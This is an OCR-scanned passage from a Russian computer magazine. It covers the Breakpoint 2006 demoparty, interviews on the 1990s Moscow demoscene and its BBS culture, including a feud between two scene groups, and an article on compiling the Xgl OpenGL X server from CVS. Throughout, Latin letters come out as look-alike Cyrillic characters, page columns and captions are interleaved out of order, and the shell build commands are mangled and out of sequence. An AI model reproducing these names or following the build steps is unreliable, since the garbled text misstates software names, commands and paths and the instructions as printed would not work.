галось изобразить летающую тарелку, марсиан, планеты или звездное 
небо, использовать один из самых древних демосценовых эффектов 
— скроллинг с летающими звездами. И все это под соответствующую 



гСамо собой, после громкого успеха трех брейкпоинтов, Сцена ждала 
^следующий фестиваль с нетерпением и возлагала на него большие на- 
дежды. Первые ІпѵіІаЛопз (маленькие демки с приглашением на пати) на 
Вгеакроіпі 2006 появились сразу после окончания ВР’05. На приглаше- 
ние откликнулись даже те, кто давно отошел от Сцены. 

Вгеакроіпі 2006, прошедший с 1 4 по 1 7 апреля, по количеству декораций 
переплюнул всех своих предшественников. Организаторы оформили 
^ место проведения в виде «джунглей» — повсюду можно было увидеть 
факелы, скелеты, виноградную лозу, а трибуна напоминала орнаменты 
древних Инков. Одним из памятных событий в этом году стал Шгазоипб 
— живое выступление музыкантов, которые на реальных инструментах 
играли музыкальные треки из известных дем (они в это время демонс- 
трировались на большом экране). На пати было представлено множес- 
тво семинаров, которые подготовили известные сценеры. Темы говорят 
^сами за себя: «Как избавиться от заголовка ѵѵіп32 ехе», «Курс хардкор- 
ных сбоев для кодеров», «Введение в ЫпихАисІіо», «Работа с компрес- 
сией» и т.п. Также, по традиции, Вгеакроіпі посетили парни из 8сепе. 
огд, которые провели собственную церемонию награждения. Зсепе.огд 
аѵѵагбз уже стало чем-то вроде Оскара на демосцене, так как номинантов 
„на премию выбирают не посетители, а авторитетное жюри, состоящее 
из олдскул-сценеров. Даже награда — статуэтка, дизайн которой раз- 



I «инопланетную» музыку. Во время пати прошло 4живых концерта, на ко- ^работал известнейший сценовый художник Ѵізиаіісе, чем-то напоминает 



торых выступали с трековой музыкой известные сценовые музыканты. 
Вскоре после окончания Вгеакроіпі 2005 вышел популярный сценовый 
■ дискмаг. Раіп назвал его «лучшим демопати всех времен». 



у НЕКОТОРЫЕ СЦЕНЕРЫ ПОСЛЕ ВПЕАК- 
РОІІЧТ 2005 ОСТАЛИСЬ НЕДОВОЛЬНЫ ТЕМ, 
ЧТО ЧАСТЬ РАБОТ В ДЕМО КОМПО БЫЛИ 
СДЕЛАНЫ НА ѴѴЕВКК2ЕЦѲ, КОНСТРУКТОРЕ 
ДЕМ, С ПОМОЩЬЮ КОТОРОГО МОЖНО 
БЫСТРО СОЗДАВАТЬ НОВЫЕ ДЕМКИ НА 
ОДНОМ ДВИЖКЕ. ПРОБЛЕМА В ТОМ, ЧТО 
ДВИЖОК ЭТОТ 5 ЛЕТНЕЙ ДАВНОСТИ, И 
ЭФФЕКТЫ, КОТОРЫЕ МОЖНО СЛЕПИТЬ С 
ЕГО ПОМОЩЬЮ, УЖЕ НЕ СМОТРЯТСЯ / 



«статуэтку Оскара. Правда, харизматичные ведущие, которые зажигали 
‘“народ на предыдущих брейкпоинтах, не смогли приехать, поэтому цере- 
. Імония прошла очень официально. 

^"Одним из отличий Вгеакроіпі от таких 1_АІ\І-пати, как АззетЫу, является 
отсутствие билетов «на один день» .Ты можешь купить только пропуск на 
Івсе 4 дня, даже если не планируешь досмотреть событие до конца. Как 



,і говорят сами организаторы, они пошли на такие меры, чтобы снизить 
«количество случайных зевак, ведь только действительно заинтересо- 
ванные в демосцене люди не поскупятся заплатить 45 Евро. Девушкам в 
Іэтом плане проще, так как для них вход бесплатный. 

Думаю, общее представление о брейкпоинте ты получил. Несмотря 
на то, что организаторы позиционируют пати как «чисто сценерское», 
посетить его могут все желающие. Даже далекие от демосцены люди 
проникаются творческим духом и после просмотра конкурсных работза- 
“гораются желанием создать что-нибудь свое. Русские сценеры, которые 
ездили на ВР, говорят, что $400 хватит вполне ($250 — билет на самолет 
'в оба конца, $50 — еда, $1 00 — входной билет и мелкие расходы). Стоит 
оно того или нет — решать тебе. Подробную информацию о пати ты смо- 
. Іжешь получить на сайте ИДр://Ьгеакроіп1.ип1егдгипб.пе1 . там же — скачать 
# все конкурсные работы. =н= 

внп 
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Сценерский лайфсгаил 

ВОСПОМИНАНИЯ 

СТАРИЧКОВ СЦЕНЫ 



ЧАСТЬ П 



Т ы уже знаешь, что до 

появления ІРС, в Москве 
было большое количес- 
тво сценерских борд. 

Они и стали тем самым 
« киберпространством » , 
в котором вращались 
ранние компьютерные 
гики. Но достать номер и дозвониться по нему, 
было недостаточно. Ведь в зависимости оттого, 
какой статус имел юзер, на этой борде ему пре- 
доставлялось определенное количество минут и 
килобайт на скачивание. Чтобы получить статус, 
необходимо было поделиться каким-нибудь 
полезным варезом с админом, оставить несколь- 
ко сообщений на «форуме». А чтобы вдоволь 
насладиться прелестями элитной борды со 
всем ее пиратским и демосценерским софтом, 
требовалось стать «элитой». 

На какие только ухищрения не шли люди, чтобы 
иметь возможность скачать побольше свежака. 
Был такой музыкант ^уЭее, который заливал 
на ВВ8 свою музыку. Писал он ее довольно 
много, в основном в стиле «техно» . Т рекерная 
музыка в то время высоко ценилась, и за ее 
аплоад админы не кисло повышали статус. Так 
вот, ^уЭее добавлял в свои трекерные модули 
кучу семплов, чтобы файлы весили как можно 
больше. А ведь чем больше килобайт зальешь, 
тем больше тебе дают привилегий ! У счастливых 
обладателей музыкальной карты 0115 с 51 2 Кб 
памяти эти треки не проигрывались, так как 
туда просто не влезали такие объемы. Конечно, 
никто про надувательство не знал: все считали, 
что если файл много весит, то музыка должна 
быть интересная и качественная, ^уйее даже 
на некоторое время попал в чарты сценерских 
е-тад'ов как самый популярный музыкант. 

Это далеко не единственный пример ухищре- 
ний. Некоторые искусственно поднимали свою 
популярность, чтобы получить высокий статус на 
ВВЗ. Например, нередко в чартах, проводимых 
дискмагами, победителями в той или иной номи- 



нации становились авторы этого езина. Другие, 
в погоне за известностью, совершали какие-то 
сомнительные покупки, например экзотическое 
железо. Все это вызывало много флеймов, и в 
итоге привело к открытой вражде между двумя 
известными сценовыми группами — ЭЭ1 епі. и 
НРд. 

Противостояние ННд и ООі 

Все началось с того, что РоуаІ ѲИозі из ЭЭ1 епі, 
увидев как-то в одном из своих артпаков неболь- 
шую интру от недавно появившейся группы НРд, 
заинтересовался ее создателями. Г ост работал 
над большим проектом ібе СИазе — многоме- 
габайтным ЗЭ-анимационным роликом — и 
пытался приобщить всех желающих к его со- 
зданию. Узнав телефонные номера ЗИагеКИап'а 
(создателя интро) и Ігоп І_ипд'а, он позвонил 
им и предложил участие в проекте, а именно: 
сделать кое-какую мелкую работу (бекграунды к 
анимации, текстурки и т.д.). НРд'шники обещали 
подумать, но через какое-то время на элитных 
бордах разожгли флейм, смысл которого можно 
передать в двух словах: «Кто он такой, чтобы 
предлагать нам быть в подмастерьях?!». НРд 
— группа, которую впоследствии по праву назо- 
вут культовой, представляла собой оппозицию 
существовавшему положению вещей на москов- 
ской сцене середины девяностых. Они хотели 
«надавать под зад всей этой ленивой, ничего 
не делающей элите» . А оружием для раздачи 
затрещин стал их дискмаг НАРМ. Процитирую 
их слова из первого выпуска журнала: « В этом 
номер© мы публикуем большую статью о том де- 
рьме, каким является наша демосцена сейчас». 
Впоследствии это стало темой не одной статьи, а 
общей темой всех их дискмагов. Лучшего спосо- 
ба показать средний палец всему сценерскому 
сообществу, чем такой дискмаг, нельзя было и 
придумать. 

К моменту выхода первого номера НАРМ'а 
группа ЭЭ1 епі. успела зарелизить ТНе СНазе, ко- 
торый постепенно распространялся по москов- 



ским бордам. Флейм НРд бурно развивался. Они 
раскритиковали в пух и прах какібе СНазе, так 
и самого РоуаІ ѲИозі’а, которому приписали за- 
явление о скором уходе со сцены. НеаѵепзВуіе 
в ответ написал статью в дискмаг «Хакер» , суть 
которой можно передать содержащейся в ней 
фразой : « Ребята, и не надейтесь — Г ост не 
уйдет». В войну вовлекались новые люди, между 
двух огней оказалась даже Т-Рех — демогруппа, 
получившая впоследствии мировую извест- 
ность. Ее лидеры хотели сохранить нейтралитет, 
за что и получили от обеих сторон по грлной 
программе. 

НРд продолжало неистовствовать, причисляя 
Г оста и компанию уже не к сцене, а к предста- 
вителям «всей остальной тухлой тусовки» . 

Такой взгляд на вещи, пожалуй, и сделал НРд 
культовой группой. Их дискмаг НАРМ стал три- 
буной для всех тех, кто хотел резко высказаться 
в адрес тусовки. Злой, но в то же время смелый 
и откровенный, журнал был по-настоящему 
интересным и вдохновляющим. Многие новички 
своим появлением и виденьем Сцены были 
обязаны именно НРд. 

Эпизоды войны 

Некоторые эпизоды из этой многолетней пере- 
палки вспоминает Мапѵѵе — многоуважаемый 
оісізсИооі сценер, глава бетозсепе.ги : 

Мапѵѵе: Помнится, мы организовывали ЗоипсІ 
Зіогт 98 рагіу, а НРС решили его бойкотировать, 
потому что туда приехали Т-Рех и ОЭТ. Когда 
настало время проведения, кто-то сообщил, что 
у метро собирается большая толпа НРО'шников. 
Вс^ реально напряглись, потому что НРѲ могли 
и морду набить, хотя бы тому же ОНозі'у. По 
крайней мере, грозились. Я был ведущим пати 
и предвидел что-то такое, поэтому у меня все 
время за поясом были сложенные нунчаки (за- 
нимаюсь этим делом). И вот вваливается толпа 
НРО'шников с криками: «Мы пришли бойкотиро- 
вать ваше долбанное пати». Но при этом вполне 
мирно рассредоточились по залу и никому не 
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мешали. Зато когда объявили перерыв на час, 
ко мне подошли несколько человек и очень « 
убедительно попросили поставить их музыку. В 
итоге НПО колбасились подхардкор и габбу, и 
на полчаса зал опустел — никто не выдержал . 
Выразившись таким образом, они окончательно 
успокоились. Мне даже удалось познакомился с 
Согрз'ом — зверским музыкантом-металлистом, 
который тогда считался «лицом НПО». 

СгазИег: Аты сам насколько был вовлечен в 
конфликт? К какой из сторон принадлежал? 
Мапѵѵе: Я всегда старался держаться от таких 
войнушек подальше. Когда перестали выходить 
журналы «Хакер» и НАПМ, и общая активность 
на Сцене снизилась, ВоуаІѲИозІ сказал: «Вот 
та сцена, о которой мечтал Мапѵѵе» :). На самом 
деле, среди «сценеров» было много людей, кото- 
рые не занимались ничем, кроме серфа по ВВЗ 
и участия в флеймах. Для них это и было Сценой . 
А для нас Сцена заключалась в ассемблере, 
рисовании и создании трекерной музыки. Нам 
просто некогда было ругаться. 

СгазИег: Насколько я знаю, ты общался с 001:, 
хотя бы в лице Г оста. А были ли среди твоих 
приятелей кто-нибудь из НВд? 

Мапѵѵе: Как я уже говорил, наЗоипб Зіогт98 
раііу познакомился с Согрзе, вернее с (Огр$е. 
Хороший спокойный парень, только слишком 
большой :). Мы даже с ним договорились напи- 
сать совместный трек. Он приехал ко мне домой 
и сделал классную партию ударных, а я — фан- 
ковую гитару. Потом я все это доделал, и трек 
пошел в журнал НАРМ (хотя, по правде, я его 
тогда терпеть не мог). К 1 998-му году количество 
мата и бессвязных потоков сознания (точнее, 



отсутствия оного) уменьшилось, появились удо- 
бочитаемые статьи — и все стало хорошо. 
СгазНег: Для многих самым интересным этапом 
на сцене была эпоха ВВЗ. Расскажи, как это 
было для тебя? 

Мапѵѵе: Модемы тогда были далеко не у всех. Во- 
первых, дорого, во-вторых, ходила такая леген- 
да, что придут с телефонной станции и отключат 
телефон. Так что многим просто родители не 
позволяли ставить модем. Лично я ходил в гости к 
другу, у которого он имелся. Обычно на ночь, так 
как ВВЗ работали именно в это время. Садились 
и дозванивались по полчаса на разные борды. 
Связь рвалась через минуту, но дозванивались 
опять. Нормальный коннект появлялся часа в 2-3 
ночи — до тех пор пили чай с сыром, слушали 
всякую музыку и болтали о жизни. Потом я стал 
притаскивать свой компьютер (многозадачнос- 
ти-то не было), чтобы, пока один звонит на ВВЗ, 
на втором можно было что-то кодить, писать му- 
зыку или просто демки новые смотреть. Однаж- 
ды ночью шли с другом к нему домой и несли мой 
компьютер: я тащил монитор, он — системный 
блок. А время неспокойное было, по ночам-то. И 
вот от ближайшего ночного магазина отделяется 
девушка, кладет одну руку на плечо, другую — на 
монитор, и невинно так предлагает: «Пойдем, на 
компьютере поиграем, а?» :) 

СгазНег: И как вы поступили? 

Мапѵѵе: Ну, мы в эту ночь уже запланировали 
вирус писать :). Самое ценное, что было на ВВЗ 
— свежие демки и 64-іпіго. Например, прошла 
АззетЫу'95 — и все сразу рванули на ВуІеТаІІ 
ВВЗ, у админа которой (Еиддіе) был инет. Он 
скачивал релизы и выкладывал на свою борду. 



Первое время после пати туда было просто не 
пробиться. Кроме того, админ могтебя в любое г 
время отключить, если, например, ждал звонка. 
Поэтому с сисопами нужно было дружить. Лично 
я никогда не был сторонником «полезных зна- 
комств» , поэтому меня все время отключали. Да 
и вообще у меня был невысокий статус на ВВЗ. 
Кроме ІЧеоп Огеат, которой заправлял ХреН, мы 
с ним сдружились в геаі ІіТе. Самая феерия была, 
когда две-три ночи пытаешься слить какую-то 
демку, под утро она, наконец, скачивается и... не 
запускается. Потому что либо саунд-карта у тебя 
не та, либо памяти не хватает, либо еще что-то. 
Бились с настройками ВІОЗ'а, вытаскивали 
память из одного компьютерав другой, видео- 
карты меняли. До сих пор помню, как мы первый 
раз увидели 64к-іпіго «СгіІІ» — первое место с 
Азт'95. Мы на нее смотрели во все глаза! Кто-то 1 
' первый вышел из транса, протянул руку и нажал 
ввод — посмотрели еще раз. Пошли, налили 
чаю, нарезали сыру и еще раз пять посмотрели, 
стараясь понять, фейковые ли тени, сделан ли 
вокселями Зб-фрактал или нет и т.д. Так вот и 
жили :). 

СгазИег: А когда появился инет? 

Мапѵѵе: Я считаю, что инет убил Сцену. Ну, не так 
прям буквально, но очень повлиял на смещение 
ценностей. Например, с приходом инета стало 
возможным не придумывать алгоритмы самому, 
а брать уже готовый код. До этого многие демо- 
кодеры были «отшельниками». Мне рассказы- 
вали про какую-то амижную демогруппу. Ребята 
приехали надемопати заранее, на несколько 
дней заперлись в гостинице и непрерывно 
писали на своих Амигахдему, которая и заняла 
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I. Г оуппа ННд на Сііаоз Сопзігисііопз 99 

II . Сценеры на Епіідііі 1 995. Справа 
налево: Міке, ЕотЫе, НоуаІ СІіозі (в 
черной рубашке), Согопег, иауИее 



“V . Демопати ВКтапіа за кулисами 

VI . Недавняя фотка НоуаІ СІіозі 

VII . Молодой Мап 



III ш Доска сообщений на Епіідііі 97 

IV. Известные сценовые музыканты 
Натгаі (слева) и Мапѵѵе (справа) 











АЫЗі-обложка знаменитого дискмага НАНМ 



Проект ООХ Т/іе СІіазе 



ННр://зсепе.огд — здесь, в разделе тадз, 
папках Иаскег и Нагт, можно скачать 
некогда культовые сценовые дискмаги. 
ИДр://сІетозсепе.ги — мировая и русская 
демосцена, портал Мапѵѵе. 
ИДр://зсепе.гросІ.ги — подкасты Мапѵѵе 
о сцене. 

ИДр://1зіІга.зрЬ.ги — компьютерное 
искусство и субкультура. 
ИДр://ѵесІаЗсІ.сот/ргі/іИе сИазе.Иіт 
— знаменитая ТИе СИазе от 001 епі. 
ИДрѴ/позсепе.ога.ги — новостной портал 
«обо всем» для сценеров. 



первое место. У меня самого лучшая музыка по- 
лучалась, когда я на несколько дней отрубался 
от реальности — например, уезжал с компьюте- 
ром к бабушке погостить :). 

СгазНег: Г оворят, ты был организатором демо- 
пати? 

Мапѵѵе: Я участвовал в организации трех демо- 
пати в Москве: БК-тапіа'96, БК-тапіа'97 
и ВуІеТаІ I ' 98/99 (его намечали на конец 98-го 
года, но перенесли на начало 99-го). А, ну еще 
БоипсІ 5іогт'98. Кстати, в 99-м году НВд пришли 
на ВуІеТаІІ в боевой раскраске и косухах, всем 
своим видом грозя устроить нечто антисоци- 
альное :). Но в итоге просто раскрашивали всех 
желающих черным гримом — наподобие КІЗЗ. 
Такие они были ребята. 

Хотя страсти на ВВЗ (а позже на ІВС) кипели не 
шуточные, а в дискмагах лились тонны помоев на 
идеологических врагов, до банального мордо- 
боя все же не опускались (хотя время от времени 
и угрожали). Чтобы знать историю конфликта, о 
том, как все началось, я пообщался с централь- 
ной фигурой в противостоянии, с человеком, 
делавшим дискмаг «Хакер», художником и 
лютым врагом НВд — ВоуаІ ѲНозГом: 

Сгазбег: Г ост, как я понял, началось все с того, 
что ты предложил НВд'шникам сотрудничество в 
твоем проекте? 

ОН: Да, причем никто из них не просил более 
существенную работу. Просто парни решили 
пофлеймить, мол, как так, нас — ив «подмасте- 
рья»? 

СгазЬег: Как ты сам отреагировал на флейм? 

ОН: Пока они флеймили, мы доделали СИазе, и 
в итоге его зарелизили. Воттут началось самое 
веселое. Не помню, то ли по телефону, то ли 
на Неаѵепз Вуіе ВВЗ, Ланг (ігоп І_ипд) сказал 
историческую фразу: «Гост, зачем тЬі распро- 
страняешь по ВВЗ'кам свой СНазе?! Он никому 
НЕ НРАВИТСЯ». Тем самым он взял на себя 
право говорить за всех. И они начали развивать 
эту теорию, вто время какСНазе разползапся по 
Сцене даже без моего участия. 



СгазНег: Тебя действительно грозились побить? 
ОН: Ха! На этот счет все стало ясно во время 
памятной встречи МЗрго (Спрокета, редактора 
дискмага НАЕМ) со мной на «покпонке» . До это-' 
го действительно подогревались страсти тем, 
что любая моя встреча с членами НЛО закончит- 
ся избиением. Мол, я проповедую неправильные 
идеи, делаю галимый журнал, пишу туда всякую 
фигню, не даю развиваться Сцене. Натой самой 
встрече Спро даже не предпринял попыток 
пошуметь. Сидел себе тихо-мирно, давился 
пивком. А потом написал в Напл’е: «Что мне 
оставалось делать?» . Конфликт вообЩб скорее 
был бумажным, нежели реальным. Мы вместе 
тусили на ВуІеРаІГах и ЕпІідИі'ах, здоровались как 
нормальные люди. 

СгазГег: Какие были самые яркие моменты 
вашей войнушки? 

ОН: Из противостояния мне запомнились два 
момента: когда вышли статьи о демосцене 
в НагсГп'зоІІ и мое интервью в « Компьютер и 
жизнь» . Это ребятам из НВд сильно не понра- 
вилось, за что я и получил очередную порцию 
помоев, а также блистательное выступление по 
радио Корпса, запись которого дал мне прослу- 
шать Тапдегіпе. Мы, само собой, тоже молчать 
не стали :). 

СгазНег: Странная у вас война получилась. Чуть 
ли не бухаете вместе :). 

С Н : А так и должно быть . Потому что Сцена — это 
когда меряются интеллектом, а не мускула- 
ми. Неважно, выражен он в творчестве или в 
политике. 

СгазИег: Интеллект — это хорошо, а как насчет 
таланта? Креатива? 

СН:^ез талантов никуда. Например, Мапѵѵе с 
СобеВірреГом (ныне {год, организатор СИаоз 
Сопігисііопз) придерживаются теории, что Сцена 
— это только соревнование талантов, своего 
рода олимпиада для ботаников. Но все мы люди, 
и у нас бывают споры и разногласия. Не будь 
этого — Сцена былабы пресной. 

СгазНег: Ваше противостояние с НРС закончи- 
лось развалом обеих команд? 
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Заставка одной из элитных ЕЗВ5 Л/еі/ег/_алс/ 



ОН: Месяц назад мне один мой новый друг, 
который не имеет представления о демосце- 
не, предложил вместе сходить на выставку 
авторской игрушки. Прикинь, приходим мы, а 
там — одни знакомые морды: Ігоп І_ипдизНВд, 
РгодгаттегДгоиЫе, Оаіа. Когда я отошел, Ланг 
подскакивает к приятелю и спрашивает: «Откуда 



ОР 



Госта знаешь?!». В общем, Мини (приятель этот) 
вернулся с улыбкой на лице: «Мне тут Ланг про 
тебя сейчас такого понарассказывал ! » Так что 
кончился конфликт или нет — трудно сказать. Но 
теперь вот подумываю начать делать авторские 
игрушки. 

Продолжение следует. . . зс 



Фоновая картинка к 8-му Хакеру 

Ьн 

История создания 
дискмага «Хакер» от 
его основателя Коуаі 
СЬозі: / / ИИі: епи 

Как-то мы сидели с Міке 2отЬіе у него 
дома, пили пиво и обсуждали идею созда- 
ния журнала. Майк предложил название 
« Водка» , и к концу вечера, изрядно « на- 
кушавшись», мы уже представляли себе 
частные небоскребы, голых секретарш и 
ванную с шампанским. Но по прошествии 
недели интерес к идее угас: одно дело 
мечтать, другое — делать. Через какое-то 
время на одной постоянной тусе, которую 
мы называли «Хонкой» (в честь одно- 
именной ВВЗ НопкТеггііогу), я предложил 
кодеру, пришедшему впервые, попробо- 
вать написать оболочку для журнала. Он 
согласился. Так все и началось. Получив 
шелл, я принялся его наполнять текстами. 
Пилотный выпуск никого не впечатлил. 
Взялся делать второй, параллельно 
раскидывая первый по ВВЗ. Звонил, 
логинился, регился, заливал, уходил — и 
так по 5 часов в день. Второй номер тоже 
не вызвал ажиотажа, а вот уже с третьего 
дело двинулось. 

Перед самым релизом пятого «Хакера» 
приехал Зігееі Ваібег и привез новый шелл 
для дискмага. Так пятый номер вышел на 
более продвинутом «движке», с новым 
0111. И тут всех вставило. 

Восьмой номер, на мой взгляд, оказался 
самым грамотным. Девятый сделали по 
инерции. А десятый, хоть и собрали, так и 
не выпустили. 
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ЕВГЕНИЙ ЗОБНИН АКА Л М 

/ ЛМ@ЫЗТ.ІШ / 



Третье графическое 

измерение 



Система X ѴѴіпсІо\л/ на базе ОрепѲІ. 






ТЕБЕ НАДОЕЛ ТВОИ СКУЧНЫЙ РАБОЧИЙ СТОЛ, ЭФФЕКТЫ КОЕ И ОІЧОМЕ УЖЕ НЕ РАДУ- 
ЮТ ГЛАЗ? ТЫ ХОЧЕШЬ ЧЕГО-ТО ЯРКОГО, КРАСИВОГО, ЭКЗОТИЧЕСКОГО, ЧТОБЫ РАБО- 
ЧИЙ СТОЛ СТАЛ ЖИВЫМ, ОБЪЕМНЫМ, ГИПНОТИЗИРУЮЩИМ, А ДРУЗЬЯ, УВИДЕВ ЕГО, 
ПАДАЛИ СО СТУЛЬЕВ? НЕТ НИЧЕГО ПРОЩЕ! СЕГОДНЯ МЫ ОПРОБУЕМ ХѲІ_ — Х-СЕРВЕР 
НА БАЗЕ ОРЕМѲЬ. 




Знаменитый эффект куба 



Зсаіе: наверное, самый полезный АІІ+ ТаЬ: переключение между окнами 

эффект 



Начало начал 

История ХдІ началась в недрах небезызвест- 
ной компании І\ІоѵеІІ. Главным архитектором и 
разработчиком проекта стал Дэвид Рэвеман 
(ЭаѵісІ Веѵетап), служащий в компании про- 
граммистом. Вплоть до 2006-го года разработ- 
ка велась закрыто, и о достигнутых успехах 
могли знать только руководство компании и 
сам Дэвид. Сразу после нового года, 2 января 
2006 года, Дэвид решил поделиться своими 
наработками и поместил исходники в СѴ5- 
репозиторий проекта Ігеебезкіор.ога . После 
открытия исходных кодов к проекту присо- 
единилось еще несколько разработчиков из 
крупных І_іпих-компаний, а в сети, как грибы 
после дождя, стали появляться документы, 
описывающие процесс сборки и исполь- 
зования ХдІ. Так начался бум популярности 
нового Х-сервера. На данный момент почти все 
крупные І_іпих-поставщики заявили о своем 
намерении включить ХдІ в свои дистрибутивы. 

Зачем оно нам? 

Вопреки распространенному мнению, Ореп(ЗІ_ 
хорош не только для отрисовки ЗЭ-графики 
и создания красивых визуальных эффектов. 
Подсистема ОрепОІ_ вкупе с современной 
видеокартой по скорости отрисовки и обра- 
ботки графики с легкостью обгоняет любую 2Э 



графическую подсистему (разве что Маігох со 
своими 2Э-ускорителями может составить ей 
конкуренцию). И все благодаря чипу ЗЭ-уско- 
рителя, который берет на себя сложнейшую 
работу по обработке видеоинформации. Как 
следствие, используя ХдІ, мы получаем ре- 
кордную скорость отрисовки изображения, ап- 
паратное сглаживание шрифтов, настоящую 
прозрачность (благодаря композитной модели 
окон) и еще многие прелести ОрепОЦ вроде 
возможности установки различных разреше- 
ний и глубины цвета индивидуально для каж- 
дого окна. Кроме того, использование Ореп(ЗІ_ 
в 20-режиме имеет не только технические, 
но и экономические достоинства, к примеру, 
упрощение разработки видеодрайверов, так 
как теперь нет необходимости в оптимизации 
драйвера для 20- и ЗО-режимов. 

Раздвоение личности 

Нынешняя реализация ХдІ — это всего лишь 
баск обычного сервера х.огд . Для инициали- 
зации дисплея в нем используется технология 
хдіх. Это значит, что ХдІ сначала запускает 
стандартный Х-сервер, затем, используя 
расширение діх, создает окно размером в 
экран, которое и будет основой для отрисов- 
ки графики (аналог запуска ОрепОб-игры в 
полном экране). Это временное решение, и 



его недостатки очевидны. А вот что касается 
преимуществ: 

• не требуется модификация существующих 
видеодрайверов; 

•ХдІ можно запустить прямо в окне уже работа- 
ющего Х-сервера. 

Следующая же реинкарнация ХдІ будет 
основана на технологии хеді. Такой Х-сервер 
планируется перевести на спецификацию 
Е(ЗІ_ (ЕтЬеббеб ОІ_) для прямого доступа к 
функциям ЭРІ (Эігесі: Вепбегіпд Іпігазіпісіиге) 
или І_іпих РгатеЬиІІег. Для него понадобятся 
новые видеодрайвера с поддержкой той самой 
технологии ЭРІ. 

сѵ8 и все, все, все 

Наданный момент ХдІ все еще находится в 
аірба-стадии разработки, поэтому единс- 
твенный способ получить новый Х-сервер из 
официального источника — это СѴЗ. Некото- 
рые крупные дистрибьюторы І_іпих (например, 
ЗиЗе, ІІЬипІи) уже позаботились о сборке 
необходимых пакетов, поэтому владельцы 
вышеозначенных дистрибутивов должны 
последовать инструкциям, размещенным на 
официальных сайтах. Всем же остальным 
предлагаю схему самостоятельной сборки ХдІ. 
Потребуется собрать четыре компонента: 
стандартный Х-сервер от х.ога (чтобы обеспе- 
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9 

В последних версиях МасОЗ X также 
появилась возможность использовать 
ОрепОІ- в качество основы рабочего 
стола. Г рафичѳский интерфейс ѴѴіпсІоѵѵз 
Ѵізіа будет использовать РігѳсІХ для 
вывода графики (который, в свою очередь, 
базируется наОрепОЦ. 



9 

Несмотря на работоспособность. ХдІ все 
еще находится в аірба-стадии разработки 
поэтому не Факт, что исходники успешно 
соберутся, а твоя видеокарта подружится 
сХ-сервером. 



9 

Специально для демонстрационных целей 
энтузиасты создали специализированный 
ЫѵеСР на базе Оепіоо и ХдІ (когогаа.ога). 



нить совместимость с последней версией ХдІ), 
Меза (свободная реализация Ореп(ЗІ_), діі іг 
(специальная библиотека, используемая ХдІ 
для доступа к ОрепОІ_) и сам ХдІ-сервер. Для 
сборки предпочтительно обзавестись свежим 
дистрибутивом со следующими пакетами: 
ІіЬбгт второй версии, свежие версии дсопі, 
ШооІ, зіагшр-пойіісаііоп, огЫ1:2 (для сборки 
композитного и оконного менеджера сотріф, 
ІіЬзѵд, ІіЬзѵд-саіго, саіго (если хочешь любовать- 
ся эффектом сиЬе), ц\Л или д1к2.8 в зависимости 
от рабочего стола (КЭЕ или Опоте). 

После того как все необходимые пакеты будут 
установлены, обращаемся к СѴЗ-репозито- 
рию Ігеебезкіор.ога и забираем исходники (на 
прилагаемом к журналу диске ты найдешь архив 
с последним СѴЗ-деревом): 

Выполняем сѵз сНескоиІ 

# тксііг ~/СѴ5 



# таке іпзіаіі 

// Нужно для правильной сборки Меза 
#ссІ ~/СѴ8/ргоІо/ОІ_ 

# ./аіЛодеп.зІі -рге!іх=/орІ/Х1 1 

# таке іпзіаіі 

//Теперь Меза 

# ссі ~/СѴ8/Меза 

# таке Ііпих-сІгі-х86 

# таке іпзіаіі 

//тебя спросят о пути инсталляции, вводи: /орѴХ1 1/ 
іпсіибе и/орІ/Х1 1/ІіЬ 

// Стандартный Х-сервер 

# сб ~/СѴ8 

# РКО_СОМРІѲ_РАТН=/орѴХ1 1/ІіЬ/ркдсопІід РАТН=/ 
орІ/Х1 1/Ып:$РАТН иШтобиІаг/ЬиіІб.зИ -т Меза-п -О 
/орІ/Х1 1 



$ /о рѴХІ 1/Ьіп/ХдІ :1 -ас -ассеі дІх:рЬіЖег -ассеі хѵ: 
рЬи!!ег & 

Однако это сработает только для видеокарт на 
чипах Рабеоп, драйвера которых поддержи- 
вают спецификацию ЭРІ и хорошо уживаются 
с библиотекой Меза (мы ее уже собрали). 
Драйвера от пѴібіа, напротив, ЭРІ полностью 
игнорируют и используют собственную реа- 
лизацию библиотеки ОрепОІ, устанавлива- 
емую в каталог /изг/НЬ. Поэтому нам придется 
обмануть ХдІ, чтобы заставить его работать 
в системе с видеокартой от пѴібіа. Это легко 
проделать, используя механизм предваритель- 
ной загрузки библиотек: 

$ ЦО_РРЕЮАО=/и5г/ІіЬ/ІіЬОЦ.5о/орІ/Х1 1/Ьіп/ХдІ :1 -ас 
-ассеі дІх:рЬіЖег -ассеі хѵ:рЬіЖег & 



# ссі ~/СѴЗ 

# сѵз -б:рзегѵег:апопутоиз@апопсѵз.1геебезк1ор. 
огд:/сѵз/хогд Іодіп 

# сѵз - 7.3 -б:рзегѵег:апопсѵ5@сѵ5ІгеебезкЬр.огд:/ 
сѵз/хогд со арр баіа бос бгіѵег Топ! ІіЬ ргокэ иііі хзегѵег 

# сѵз -73 -б:рзегѵег:апопутоиз@апопсѵзбгеебезкіор. 
огд:/сѵз/хогд со -гхдІ-0-0-1 хзегѵег 

# сѵз -73 -б:рзегѵег:апопутоиз@апопсѵз.^геебезкгор. 
огд:/сѵз/саігосодІіІ 2 

# сѵз -73 -б:рзегѵег:апопутоиз@апопсѵзбгеебезкіор. 
огд:/сѵз/тезасо Меза 

Перед тем как переходить непосредственно 
к сборке, выполним несколько предва- 
рительных шагов: добавим строку 'ехрогі 
РАТН="$РАТН:/ор1:/Х1 1/Ып'" в файл "-/.ЬазЬгс" 
(как пользовательский, так и админский) и про- 
пишем строку «/орІ/ХІ 1/ІіЬ» в файл /еіс/іб.зо. 
сопі (она должна быть первой). Далее следуй 
приведенным инструкциям: 

Собираем ХдІ 
//Устанавливаем діііг 
#сб ~/СѴЗ/дІіІ 2 

# ,/аіЛодеп.зІі -рге!іх=/ор1/Х1 1 
#таке 



// Оконный и композитный менеджер сотріг 
//Укажи --бізаЫе-дпоте или --бізаЫе-кбе в 
//зависимости оттого, какой рабочий стол хочешь 

# сб ~/СѴЗ/арр/сотріг/ 

# РКО_СОІ\ІРІО_РАТН=/орѴХ1 1 /ІіЬ/ркдсопТід 
./аиіодеп.зіі -рге1іх=/орѴХ1 1 

#таке 

# таке іпзіаіі 

//И, наконец, ХдІ 

# сб ~/СѴЗ/хзегѵег/хогд 

# РКО_СОЫРІѲ_РАТН=/орѴХ1 1/ІіЬ/ркдсопІід 
./аиіодеп.зіі -рге!іх=/орѴХ1 1 --епаЫе-хдІ -епаЫе- 
хдізегѵег --епаЫе-дІх -бізаЫе-хѵІЬ -бізаЫе-хпезІ 
